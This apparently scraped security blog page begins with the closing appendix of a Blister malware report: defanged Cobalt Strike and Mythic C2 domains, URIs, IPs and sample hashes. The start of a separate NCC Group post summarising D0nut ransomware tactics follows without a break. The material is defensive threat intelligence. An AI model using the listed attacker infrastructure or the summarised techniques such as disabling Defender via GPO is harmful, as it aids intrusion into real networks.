1580103824clippershipintl[.]com/safebrowsing/sj0IWAb/YhcZADXFB3NHbxFtKgpqBtK9BllJiGEL
1580103824couponbrothers[.]com/safebrowsing/Jwjy4/mzAoZyZk7qHIyw3QrEpXij5WFhIo1z8JDUVA0N0
1580103824electronic-infinity[.]com/safebrowsing/TKc3hA/t-nAkENGu9rpZ9ebRRXr79b
1580103824final-work[.]com/safebrowsing/AvuvAkxsR/8I6ikMUvdNd8HOgMeD0sPfGpwSZEMr
1580103824geotypico[.]com/safebrowsing/d5pERENa/f5oBhEk7xS3cXxstp6Kx1G7u3N546UStcg9nEnzJn2k
1580103824imsensors[.]com/safebrowsing/eMUgI4Z/BOhKRIMsJsuPnn3IQvgrEc3XLQUB3W
1580103824intradayinvestment[.]com/safebrowsing/dpNqi/nXeFgGufr9VqHjDdsIZbw-ZH0
1580103824medicare-cost[.]com/safebrowsing/dpNqi/F3QExtY65SvTVK1ewA26
1580103824optiontradingsignal[.]com/safebrowsing/dpNqi/7CtHhF-isMMQ6m7NmHYNb0N7E7Fe
1580103824setechnowork[.]com/safebrowsing/fBm1b/JbcKDYjMWcQNjn69LnGggFe6mpjn5xOQ
1580103824sikescomposites[.]com/safebrowsing/Jwjy4/cmr4tZ7IyFGbgCiof2tHMO
1580103824technicollit[.]com/safebrowsing/b0kKKIjr/AzX9ZHB37oJfPsUBUaxBJjzzi132cYRZhUZc81g
1580103824wasfatsahla[.]com/safebrowsing/IsXNCJJfH/5x0rUIrn–r85sLJIuEY7C9q
206546002smutlr[.]com/functionalStatus/qPprp9dtVhrGV3R3re5Xy4M2cfQo4wB
206546002spanish-home-sales[.]com/functionalStatus/fb8ClEdmm-WwYudk-zODoQYB7DX3wQYR
Table 3, Information on observed Cobalt Strike beacons dropped by Blister.

BlisterMythic agents

DomainURI
139-177-202-78.ip.linodeusercontent[.]com/etc.clientlibs/sapdx/front-layer/dist/resources/sapcom/919.9853a7ee629d48b1ddbe.js
23-92-30-58.ip.linodeusercontent[.]com/etc.clientlibs/sapdx/front-layer/dist/resources/sapcom/919.9853a7ee629d48b1ddbe.js
aviditycellars[.]com/etc.clientlibs/sapdx/front-layer/dist/resources/sapcom/919.9853a7ee629d48b1ddbe.js
boxofficeseer[.]com/s/0.7.8/clarity.js
d1hp6ufzqrj3xv.cloudfront[.]net/organizations/oauth2/v2.0/authorize
makethumbmoney[.]com/s/0.7.8/clarity.js
rosevalleylimousine[.]com/login.sophos.com/B2C_1A_signup_signin/api/SelfAsserted/confirmed
Table 4, Information on observed Mythic agents dropped by Blister.

BlisterMythic C2 servers

IPDomain
37.1.215[.]57angelbusinessteam[.]com
92.118.112[.]100danagroupegypt[.]com
104.238.60[.]11shchiswear[.]com
172.233.238[.]215N/a
96.126.111[.]127N/a
23.239.11[.]145N/a
45.33.98[.]254N/a
45.79.199[.]4N/a
45.56.105[.]98N/a
149.154.158[.]243futuretechfarm[.]com
104.243.33[.]161sms-atc[.]com
104.243.33[.]129makethumbmoney[.]com
138.124.180[.]241vectorsandarrows[.]com
94.131.101[.]58pacatman[.]com
198.58.119[.]214N/a
185.174.101[.]53personmetal[.]com
185.45.195[.]30aviditycellars[.]com
185.250.151[.]145bureaudecreationalienor[.]com
23.227.194[.]115bitscoinc[.]com
88.119.175[.]140boxofficeseer[.]com
88.119.175[.]137thesheenterprise[.]com
37.1.214[.]162remontisto[.]com
45.66.248[.]99N/a
88.119.175[.]104visioquote[.]com
45.66.248[.]13cannabishang[.]com
92.118.112[.]8turanmetal[.]com
37.1.211[.]150lucasdoors[.]com
185.72.8[.]219displaymercials[.]com
172.232.172[.]128N/a
82.117.253[.]168digtupu[.]com
104.238.60[.]112avblokhutten[.]com
173.44.141[.]34hom4u[.]com
170.130.165[.]140rosevalleylimousine[.]com
172.232.172[.]110N/a
5.8.63[.]79boezgrt[.]com
172.232.172[.]125N/a
162.248.224[.]56hatchdesignsnh[.]com
185.174.101[.]13formulaautoparts[.]com
23.152.0[.]193ivermectinorder[.]com
192.169.6[.]200szdeas[.]com
194.87.32[.]85licencesolutions[.]com
185.45.195[.]205motorrungoli[.]com
Table 5, Detected BlisterMythic C2 servers

Blister samples

SHA256Payload familyPayload SHA256
0a73a9ee3650821352d9c4b46814de8f73fde659cae6b82a11168468becb68d1Cobalt Strike397c08f5cdc59085a48541c89d23a8880d41552031955c4ba38ff62e57cfd803
0bbf1a3a8dd436fda213bc126b1ad0b8704d47fd8f14c75754694fd47a99526cBlisterMythicab7cab5192f0bef148670338136b0d3affe8ae0845e0590228929aef70cb9b8b
0e8458223b28f24655caf37e5c9a1c01150ac7929e6cb1b11d078670da892a5bCobalt Strike4420bd041ae77fce2116e6bd98f4ed6945514fad8edfbeeeab0874c84054c80a
0f07c23f7fe5ff918ee596a7f1df320ed6e7783ff91b68c636531aba949a6f33Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
a3cb53ddd4a5316cb02b7dc4ccd1f615755b46e86a88152a1f8fc59efe170497Cobalt Strikee85a2e8995ef37acf15ea79038fae70d4566bd912baac529bad74fbec5bb9c21
a403b82a14b392f8485a22f105c00455b82e7b8a3e7f90f460157811445a8776Cobalt Strikee0c0491e45dda838f4ac01b731dd39cc7064675a6e1b79b184fff99cdce52f54
a5fc8d9f9f4098e2cecb3afc66d8158b032ce81e0be614d216c9deaf20e888acTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
a9ea85481e178cd35ae323410d619e97f49139dcdb2e7da72126775a89a8464fCobalt Strikec7accad7d8da9797788562a3de228186290b0f52b299944bec04a95863632dc0
ac232e7594ce8fbbe19fc74e34898c562fe9e8f46d4bfddc37aefeb26b85c02bCobalt Strike obfuscated shellcodecef1a88dfc436dab9ae104f0770a434891bbd609e64df43179b42b03a7e8f908
acdaac680e2194dd8fd06f937847440e7ab83ce1760eab028507ee8eba557291Cobalt Strikeb96d4400e9335d80dedee6f74ffaa4eca9ffce24c370790482c639df52cb3127
ae148315cec7140be397658210173da372790aa38e67e7aa51597e3e746f2cb2Cobalt Strikef245b2bc118c3c20ed96c8a9fd0a7b659364f9e8e2ee681f5683681e93c4d78b
aeecc65ac8f0f6e10e95a898b60b43bf6ba9e2c0f92161956b1725d68482721dCobalt Strike797abd3de3cb4c7a1ceb5de5a95717d84333bedcbc0d9e9776d34047203181bc
b062dd516cfa972993b6109e68a4a023ccc501c9613634468b2a5a508760873eCobalt Strike122b77fd4d020f99de66bba8346961b565e804a3c29d0757db807321e9910833
b10db109b64b798f36c717b7a050c017cf4380c3cb9cfeb9acd3822a68201b5bCobalt Strike902d29871d3716113ca2af5caa6745cb4ab9d0614595325c1107fb83c1494483
b1d1a972078d40777d88fb4cd6aef1a04f29c5dd916f30a6949b29f53a2d121cPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
b1f3f1c06b1cc9a249403c2863afc132b2d6a07f137166bdd1e4863a0cece5b1Cobalt Strikee63807daa9be0228d90135ee707ddf03b0035313a88a78e50342807c27658ff2
b4c746e9a49c058ae3843799cdd6a3bb5fe14b413b9769e2b5a1f0f846cb9d37Cobalt Strike stager063191c49d49e6a8bdcd9d0ee2371fb1b90f1781623827b1e007e520ec925445
b4f37f13a7e9c56ea95fa3792e11404eb3bdb878734f1ca394ceed344d22858fTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
b956c5e8ec6798582a68f24894c1e78b9b767aae4d5fb76b2cc71fc9c8befed8Cobalt Strike6fc283acfb7dda7bab02f5d23dc90b318f4c73a8e576f90e1cac235bf8d02470
b99ba2449a93ab298d2ec5cacd5099871bacf6a8376e0b080c7240c8055b1395Cobalt Strike96fab57ef06b433f14743da96a5b874e96d8c977b758abeeb0596f2e1222b182
b9e313e08b49d8d2ffe44cb6ec2192ee3a1c97b57c56f024c17d44db042fb9ebTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
bc238b3b798552958009f3a4ce08e5ce96edff06795281f8b8de6f5df9e4f0feCobalt Strike stager191566d8cc119cd6631d353eab0b8c1b8ba267270aa88b5944841905fa740335
bcd64a8468762067d8a890b0aa7916289e68c9d8d8f419b94b78a19f5a74f378Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
c113e8a1c433b4c67ce9bce5dea4b470da95e914de4dc3c3d5a4f98bce2b7d6cPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
c1261f57a0481eb5d37176702903025c5b01a166ea6a6d42e1c1bdc0e5a0b04bCobalt Strike obfuscated shellcode189b7afdd280d75130e633ebe2fcf8f54f28116a929f5bb5c9320f11afb182d4
c149792a5e5ce4c15f8506041e2f234a9a9254dbda214ec79ceef7d0911a3095Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
c2046d64bcfbab5afcb87a75bf3110e0fa89b3e0f7029ff81a335911cf52f00aCobalt Striked048001f09ad9eedde44f471702a2a0f453c573db9c8811735ec45d65801f1d0
c3509ba690a1fcb549b95ad4625f094963effc037df37bd96f9d8ed5c7136d94Cobalt Strikee0c0491e45dda838f4ac01b731dd39cc7064675a6e1b79b184fff99cdce52f54
c3cfbede0b561155062c2f44a9d44c79cdb78c05461ca50948892ff9a0678f3fCobalt Strikebcb32a0f782442467ea8c0bf919a28b58690c68209ae3d091be87ef45d4ef049
c79ab271d2abd3ee8c21a8f6ad90226e398df1108b4d42dc551af435a124043cCobalt Strike749d061acb0e584df337aaef26f3b555d5596a96bfffc9d6cd7421e22c0bacea
cab95dc6d08089dcd24c259f35b52bca682635713c058a74533501afb94ab91fPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
cea5c060dd8abd109b478e0de481f0df5ba3f09840746a6a505374d526bd28dcMythicPacker759ac6e54801e7171de39e637b9bb525198057c51c1634b09450b64e8ef47255
cfa604765b9d7a93765d46af78383978251486d9399e21b8e3da4590649c53e4Cobalt Strike stager57acdb7a22f5f0c6d374be2341dbef97efbcc61f633f324beb0e1214614fef82
d1afca36f67b24eae7f2884c27c812cddc7e02f00f64bb2f62b40b21ef431084Cobalt Strikef570bd331a3d75e065d1825d97b922503c83a52fc54604d601d2e28f4a70902b
d1b6671fc0875678ecf39d737866d24aca03747a48f0c7e8855a5b09fc08712dTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
d3d48aa32b062b6e767966a8bab354eded60e0a11be5bc5b7ad8329aa5718c76Cobalt Strike60905c92501ec55883afc3f6402a05bddfd335323fdc0144515f01e8da0acbda
d3eab2a134e7bd3f2e8767a6285b38d19cd3df421e8af336a7852b74f194802cBlisterMythic2fd38f6329b9b2c5e0379a445e81ece43fe0372dec260c1a17eefba6df9ffd55
d439f941b293e3ded35bf52fac7f20f6a2b7f2e4b189ad2ac7f50b8358110491Cobalt Strike18a9eafb936bf1d527bd4f0bfae623400d63671bafd0aad0f72bfb59beb44d5f
dac00ec780aabaffed1e89b3988905a7f6c5c330218b878679546a67d7e0eef2Cobalt Strikeadc73af758c136e5799e25b4d3d69e462e090c8204ec8b8f548e36aac0f64a66
db62152fe9185cbd095508a15d9008b349634901d37258bc3939fe3a563b4b3cMythicPacker7f71d316c197e4e0aa1fce9d40c6068ada4249009e5da51479318de039973ad8
db81e91fc05991f71bfd5654cd60b9093c81d247ccd8b3478ab0ebef61efd2adPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
dd42c1521dbee54173be66a5f98a811e5b6ee54ad1878183c915b03b68b7c9bbCobalt Striked988a867a53c327099a4c9732a1e4ced6fe6eca5dd68f67e5f562ab822b8374b
e0888b80220f200e522e42ec2f15629caa5a11111b8d1babff509d0da2b948f4Cobalt Strike915503b4e985ab31bc1d284f60003240430b3bdabb398ae112c4bd1fe45f3cdd
e30503082d3257737bba788396d7798e27977edf68b9dba7712a605577649ffbCobalt Strikedf01b0a8112ca80daf6922405c3f4d1ff7a8ff05233fc0786e9d06e63c9804d6
e521cad48d47d4c67705841b9c8fa265b3b0dba7de1ba674db3a63708ab63201Cobalt Strike stager40cac28490cddfa613fd58d1ecc8e676d9263a46a0ac6ae43bcbdfedc525b8ee
e62f5fc4528e323cb17de1fa161ad55eb451996dec3b31914b00e102a9761a52Cobalt Strike19e7bb5fa5262987d9903f388c4875ff2a376581e4c28dbf5ae7d128676b7065
ebafb35fd9c7720718446a61a0a1a10d09bf148d26cdcd229c1d3d672835335cCobalt Strike5cb2683953b20f34ff26ddc0d3442d07b4cd863f29ec3a208cbed0dc760abd04
ebf40e12590fcc955b4df4ec3129cd379a6834013dae9bb18e0ec6f23f935bbaCobalt Striked99bac48e6e347fcfd56bbf723a73b0b6fb5272f92a6931d5f30da76976d1705
ef7ff2d2decd8e16977d819f122635fcd8066fc8f49b27a809b58039583768d2Cobalt Strikeadc73af758c136e5799e25b4d3d69e462e090c8204ec8b8f548e36aac0f64a66
efbffc6d81425ffb0d81e6771215c0a0e77d55d7f271ec685b38a1de7cc606a8Cobalt Strike47bd5fd96c350f5e48f5074ebee98e8b0f4efb8a0cd06db5af2bdc0f3ee6f44f
f08fdb0633d018c0245d071fa79cdc3915da75d3c6fc887a5ca6635c425f163aTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
f3bfd8ab9e79645babf0cb0138d51368fd452db584989c4709f613c93caf2bdcCobalt Strikecd7135c94929f55e19e5d66359eab46422c3c59d794dde00c8b4726498e4e01a
f58de1733e819ea38bce21b60bb7c867e06edb8d4fd987ab09ecdbf7f6a319b9MythicPacker19eae7c0b7a1096a71b595befa655803c735006d75d5041c0e18307bd967dee6
f7fa532ad074db4a39fd0a545278ea85319d08d8a69c820b081457c317c0459eCobalt Strike902d29871d3716113ca2af5caa6745cb4ab9d0614595325c1107fb83c1494483
fce9de0a0acf2ba65e9e252a383d37b2984488b6a97d889ec43ab742160acce1Cobalt Strike stager40cac28490cddfa613fd58d1ecc8e676d9263a46a0ac6ae43bcbdfedc525b8ee
ffb255e7a2aa48b96dd3430a5177d6f7f24121cc0097301f2e91f7e02c37e6bfCobalt Strike5af6626a6bc7265c21adaffb23cc58bc52c4ebfe5bf816f77711d3bc7661c3d6
1a50c358fa4b725c6e0e26eee3646de26ba38e951f3fe414f4bf73532af62455Cobalt Strike8f1cc6ab8e95b9bfdf22a2bde77392e706b6fb7d3c1a3711dbc7ccd420400953
1be3397c2a85b4b9a5a111b9a4e53d382df47a0a09065639d9e66e0b55fe36fcCobalt Strike stager3f28a055d56f46559a21a2b0db918194324a135d7e9c44b90af5209a2d2fd549
1d058302d1e747714cac899d0150dcc35bea54cc6e995915284c3a64a76aacb1Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
02b1bd89e9190ff5edfa998944fd6048d32a3bde3a72d413e8af538d9ad770b4Cobalt Strike obfuscated shellcode3760db55a6943f4216f14310ab10d404e5c0a53b966dd634b76dd669f59d2507
2cf125d6f21c657f8c3732be435af56ccbe24d3f6a773b15eccd3632ea509b1aPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
2f2e62c9481ba738a5da7baadfc6d029ef57bf7a627c2ac0b3e615cab5b0cfa2Cobalt Strike39ed516d8f9d9253e590bad7c5daecce9df21f1341fb7df95d7caa31779ea40f
3bc8ce92409876526ad6f48df44de3bd1e24a756177a07d72368e2d8b223bb39Cobalt Strike20e43f60a29bab142f050fab8c5671a0709ee4ed90a6279a80dd850e6f071464
3dffb7f05788d981efb12013d7fadf74fdf8f39fa74f04f72be482847c470a53Cobalt Strike8e78ad0ef549f38147c6444910395b053c533ac8fac8cdaa00056ad60b2a0848
3f6e3e7747e0b1815eb2a46d79ebd8e3cb9ccdc7032d52274bc0e60642e9b31ePutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
3fff407bc45b879a1770643e09bb99f67cdcfe0e4f7f158a4e6df02299bac27eTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
4b3cd3aa5b961791a443b89e281de1b05bc3a9346036ec0da99b856ae7dc53a8Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
4faf362b3fe403975938e27195959871523689d0bf7fba757ddfa7d00d437fd4Cobalt Strike60905c92501ec55883afc3f6402a05bddfd335323fdc0144515f01e8da0acbda
5d72cc2e47d3fd781b3fc4e817b2d28911cd6f399d4780a5ff9c06c23069eae1MythicPacker9a08d2db7d0bd7d4251533551d4def0f5ee52e67dff13a2924191c8258573024
5ea74bca527f7f6ea8394d9d78e085bed065516eca0151a54474fffe91664198Cobalt Strikebe314279f817f9f000a191efb8bcc2962fcc614b1f93c73dda46755269de404f
5fc79a4499bafa3a881778ef51ce29ef015ee58a587e3614702e69da304395dbBlisterMythic3d2499e5c9b46f1f144cfbbd4a2c8ca50a3c109496a936550cbb463edf08cd79
06cd6391b5fcf529168dc851f27bf3626f20e038a9c0193a60b406ad1ece6958Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
6a7ae217394047c17d56ec77b2243d9b55617a1ff591d2c2dfc01f2da335cbbfMythicPacker1e3b373f2438f1cc37e15fdede581bdf2f7fc22068534c89cb4e0c128d0e45dd
6e75a9266e6bbfd194693daf468dd86d106817706c57b1aad95d7720ac1e19e3Cobalt Strike4adf3875a3d8dd3ac4f8be9c83aaa7e3e35a8d664def68bc41fc539bfedfd33f
7e61498ec5f0780e0e37289c628001e76be88f647cad7a399759b6135be8210aTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
7f7b9f40eea29cfefc7f02aa825a93c3c6f973442da68caf21a3caae92464127Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
8b6eb2853ae9e5faff4afb08377525c9348571e01a0e50261c7557d662b158e1Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
8d53dc0857fa634414f84ad06d18092dedeb110689a08426f08cb1894c2212d4Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
8e6c0d338f201630b5c5ba4f1757e931bc065c49559c514658b4c2090a23e57bCobalt Strikef2329ae2eb28bba301f132e5923282b74aa7a98693f44425789b18a447a33bff
8f9289915b3c6f8bf9a71d0a2d5aeb79ff024c108c2a8152e3e375076f3599d5BlisterMythicf89cfbc1d984d01c57dd1c3e8c92c7debc2beb5a2a43c1df028269a843525a38
9c5c9d35b7c2c448a610a739ff7b85139ea1ef39ecd9f51412892cd06fde4b1bTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
13c7f28044fdb1db2289036129b58326f294e76e011607ca8d4c5adc2ddddb16Cobalt Strike19e7bb5fa5262987d9903f388c4875ff2a376581e4c28dbf5ae7d128676b7065
19b0db9a9a08ee113d667d924992a29cd31c05f89582953eff5a52ad8f533f4bTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
19d4a7d08176119721b9a302c6942718118acb38dc1b52a132d9cead63b11210Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
22e65a613e4520a6f824a69b795c9f36af02247f644e50014320857e32383209Cobalt Strike18a9eafb936bf1d527bd4f0bfae623400d63671bafd0aad0f72bfb59beb44d5f
028da30664cb9f1baba47fdaf2d12d991dcf80514f5549fa51c38e62016c1710Cobalt Strike8e78ad0ef549f38147c6444910395b053c533ac8fac8cdaa00056ad60b2a0848
37b6fce45f6bb52041832eaf9c6d02cbc33a3ef2ca504adb88e19107d2a7aeaaCobalt Strike902d29871d3716113ca2af5caa6745cb4ab9d0614595325c1107fb83c1494483
42beac1265e0efc220ed63526f5b475c70621573920968a457e87625d66973afTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
43c1ee0925ecd533e0b108c82b08a3819b371182e93910a0322617a8acf26646Cobalt Strike5cb2683953b20f34ff26ddc0d3442d07b4cd863f29ec3a208cbed0dc760abd04
44ce7403ca0c1299d67258161b1b700d3fa13dd68fbb6db7565104bba21e97aeMythicPackerf3b0357562e51311648684d381a23fa2c1d0900c32f5c4b03f4ad68f06e2adc1
49ba10b4264a68605d0b9ea7891b7078aeef4fa0a7b7831f2df6b600aae77776Cobalt Strike0603cf8f5343723892f08e990ae2de8649fcb4f2fd4ef3a456ef9519b545ed9e
54c7c153423250c8650efc0d610a12df683b2504e1a7a339dfd189eda25c98d4Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
58fdee05cb962a13c5105476e8000c873061874aadbc5998887f0633c880296aTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
73baa040cd6879d1d83c5afab29f61c3734136bffe03c72f520e025385f4e9a2Cobalt Strike17392d830935cfad96009107e8b034f952fb528f226a9428718669397bafd987
78d93b13efd0caa66f5d91455028928c3b1f44d0f2222d9701685080e30e317dPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
83c121db96d99f0d99b9e7a2384386f3f6debcb01d977c4ddca5bcdf2c6a2daaCobalt Strike stager39323f9c0031250414cb4683662e1c533960dea8a54d7a700f77c6133a59c783
84b245fce9e936f1d0e15d9fca8a1e4df47c983111de66fcc0ad012a63478c8dCobalt Strike stagerd961e9db4a96c87226dbc973658a14082324e95a4b30d4aae456a8abe38f5233
84b2d16124b690d77c5c43c3a0d4ad78aaf10d38f88d9851de45d6073d8fcb65Cobalt Strike0091186459998ad5b699fdd54d57b1741af73838841c849c47f86601776b0b33
85d3f81a362a3df9ba2f0a00dd12cd654e55692feffc58782be44f4c531d9bb9Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
96e8b44ec061c49661bd192f279f7b7ba394d03495a2b46d3b37dcae0f4892f1Cobalt Strike stager6f7d7da247cac20d5978f1257fdd420679d0ce18fd8738bde02246129f93841b
96ebacf48656b804aed9979c2c4b651bbb1bc19878b56bdf76954d6eff8ad7caCobalt Striked988a867a53c327099a4c9732a1e4ced6fe6eca5dd68f67e5f562ab822b8374b
113c9e7760da82261d77426d9c41bc108866c45947111dbae5cd3093d69e0f1dPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
149c3d044abc3c3a15ba1bb55db7e05cbf87008bd3d23d7dd4a3e31fcfd7af10Cobalt Strikee63807daa9be0228d90135ee707ddf03b0035313a88a78e50342807c27658ff2
307fc7ebde82f660950101ea7b57782209545af593d2c1115c89f328de917dbbCobalt Strike stager40cac28490cddfa613fd58d1ecc8e676d9263a46a0ac6ae43bcbdfedc525b8ee
356efe6b10911d7daaffed64278ba713ab51f7130d1c15f3ca86d17d65849fa5Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
394ce0385276acc6f6c173a3dde6694881130278bfb646be94234cc7798fd9a9Cobalt Strike60e2fe4eb433d3f6d590e75b2a767755146aca7a9ba6fd387f336ccb3c5391f8
396dce335b16111089a07ecb2d69827f258420685c2d9f3ea9e1deee4bff9561Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
541eab9e348c40d510db914387068c6bfdf46a6ff84364fe63f6e114af8d79cfCobalt Strike stager4e2a011922e0060f995bfde375d75060bed00175dc291653445357b29d1afc38
745a3dcdda16b93fedac8d7eefd1df32a7255665b8e3ee71e1869dd5cd14d61cCobalt Strike obfuscated shellcodecef1a88dfc436dab9ae104f0770a434891bbd609e64df43179b42b03a7e8f908
753f77134578d4b941b8d832e93314a71594551931270570140805675c6e9ad3Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
863de84a39c9f741d8103db83b076695d0d10a7384e4e3ba319c05a6018d9737Cobalt Strike3a1e65d7e9c3c23c41cb1b7d1117be4355bebf0531c7473a77f957d99e6ad1d4
902fa7049e255d5c40081f2aa168ac7b36b56041612150c3a5d2b6df707a3cffCobalt Strike397c08f5cdc59085a48541c89d23a8880d41552031955c4ba38ff62e57cfd803
927e04371fa8b8d8a1de58533053c305bb73a8df8765132a932efd579011c375Cobalt Strike2e0767958435dd4d218ba0bc99041cc9f12c9430a09bb1222ac9d1b7922c2632
2043d7f2e000502f69977b334e81f307e2fda742bbc5b38745f6c1841757fddcTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
02239cac2ff37e7f822fd4ee57ac909c9f541a93c27709e9728fef2000453afeCobalt Strike18a9eafb936bf1d527bd4f0bfae623400d63671bafd0aad0f72bfb59beb44d5f
4257bf17d15358c2f22e664b6112437b0c2304332ff0808095f1f47cf29fc1a2Cobalt Strike3a1e65d7e9c3c23c41cb1b7d1117be4355bebf0531c7473a77f957d99e6ad1d4
6558ac814046ecf3da8c69affea28ce93524f93488518d847e4f03b9327acb44Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
8450ed10b4bef6f906ff45c66d1a4a74358d3ae857d3647e139fdaf0e3648c10BlisterMythicab7cab5192f0bef148670338136b0d3affe8ae0845e0590228929aef70cb9b8b
9120f929938cd629471c7714c75d75d30daae1f2e9135239ea5619d77574c1feCobalt Strike647e992e24e18c14099b68083e9b04575164ed2b4f5069f33ff55f84ee97fff0
28561f309d208e885a325c974a90b86741484ba5e466d59f01f660bed1693689Cobalt Strike397c08f5cdc59085a48541c89d23a8880d41552031955c4ba38ff62e57cfd803
30628bcb1db7252bf710c1d37f9718ac37a8e2081a2980bead4f21336d2444bcCobalt Strike obfuscated shellcode13f23b5db4a3d0331c438ca7d516d565a08cac83ae515a51a7ab4e6e76b051b1
53121c9c5164d8680ae1b88d95018a553dff871d7b4d6e06bd69cbac047fe00fCobalt Strike902d29871d3716113ca2af5caa6745cb4ab9d0614595325c1107fb83c1494483
67136ab70c5e604c6817105b62b2ee8f8c5199a647242c0ddbf261064bb3ced3Cobalt Strike obfuscated shellcode0aecd621b386126459b39518f157ee240866c6db1885780470d30a0ebf298e16
79982f39ea0c13eeb93734b12f395090db2b65851968652cab5f6b0827b49005MythicPacker152455f9d970f900eb237e1fc2c29ac4c72616485b04e07c7e733b95b6afc4d8
87269a95b1c0e724a1bfe87ddcb181eac402591581ee2d9b0f56dedbaac04ff8Cobalt Strikef3d42e4c1a47f0e1d3812d5f912487d04662152c17c7aa63e836bef01a1a4866
89196b39a0edebdf2026053cb4e87d703b9942487196ff9054ef775fdcad1899Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
91446c6d3c11074e6ff0ff42df825f9ffd5f852c2e6532d4b9d8de340fa32fb8Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
96823bb6befe5899739bd69ab00a6b4ae1256fd586159968301a4a69d675a5ecCobalt Strike3b3bdd819f4ee8daa61f07fc9197b2b39d0434206be757679c993b11acc8d05f
315217b860ab46c6205b36e49dfaa927545b90037373279723c3dec165dfaf11Cobalt Strike96fab57ef06b433f14743da96a5b874e96d8c977b758abeeb0596f2e1222b182
427481ab85a0c4e03d1431a417ceab66919c3e704d7e017b355d8d64be2ccf41Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
595153eb56030c0e466cda0becb1dc9560e38601c1e0803c46e7dfc53d1d2892Cobalt Strikef245b2bc118c3c20ed96c8a9fd0a7b659364f9e8e2ee681f5683681e93c4d78b
812263ea9c6c44ef6b4d3950c5a316f765b62404391ddb6482bdc9a23d6cc4a6Cobalt Strike18a9eafb936bf1d527bd4f0bfae623400d63671bafd0aad0f72bfb59beb44d5f
1358156c01b035f474ed12408a9e6a77fe01af8df70c08995393cbb7d1e1f8a6Cobalt Strikeb916749963bb08b15de7c302521fd0ffec1c6660ba616628997475ae944e86a3
73162738fb3b9cdd3414609d3fe930184cdd3223d9c0d7cb56e4635eb4b2ab67Cobalt Strike19e7bb5fa5262987d9903f388c4875ff2a376581e4c28dbf5ae7d128676b7065
343728792ed1e40173f1e9c5f3af894feacd470a9cdc72e4f62c0dc9cbf63fc1Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
384408659efa1f87801aa494d912047c26259cd29b08de990058e6b45619d91aCobalt Strike stager824914bb34ca55a10f902d4ad2ec931980f5607efcb3ea1e86847689e2957210
49925637250438b05d3aebaac70bb180a0825ec4272fbe74c6fecb5e085bcf10Cobalt Strikee0c0491e45dda838f4ac01b731dd39cc7064675a6e1b79b184fff99cdce52f54
Table 6, Hashes of Blister samples and of the payload it drops, including the payload label.

D0nut encrypt me, I have a wife and no backups 

6 November 2023 at 18:06

Unveiling the Dark Side: A Deep Dive into Active Ransomware Families

Author: Ross Inman (@rdi_x64)

Introduction

Our technical experts have written a blog series focused on Tactics, Techniques and Procedures (TTP’s) deployed by four ransomware families recently observed during NCC Group’s incident response engagements.  

In case you missed it, last time we analysed an Incident Response engagement involving BlackCat Ransomware. In this instalment, we take a deeper dive into the D0nut extortion group. 

The D0nut extortion group was first reported in August 2022 for breaching networks and demanding ransoms in return for not leaking stolen data. A few months later, reports of the group utilizing encryption as well as data exfiltration were released with speculation that the ransomware deployed by the group was linked to HelloXD ransomware. There is also suspected links between D0nut affiliates and both Hive and Ragnar Locker ransomware operations. 

Summary 

Tl;dr 

This post explores some of the TTPs employed by a threat actor who was observed deploying D0nut ransomware during an incident response engagement. 

Below provides a summary of findings which are presented in this blog post: 

  • Heavy use of Cobalt Strike Beacons to laterally move throughout the compromised network.  
  • Deployment of SystemBC to establish persistence.  
  • Modification of a legitimate GPO to disable Windows Defender across the domain.  
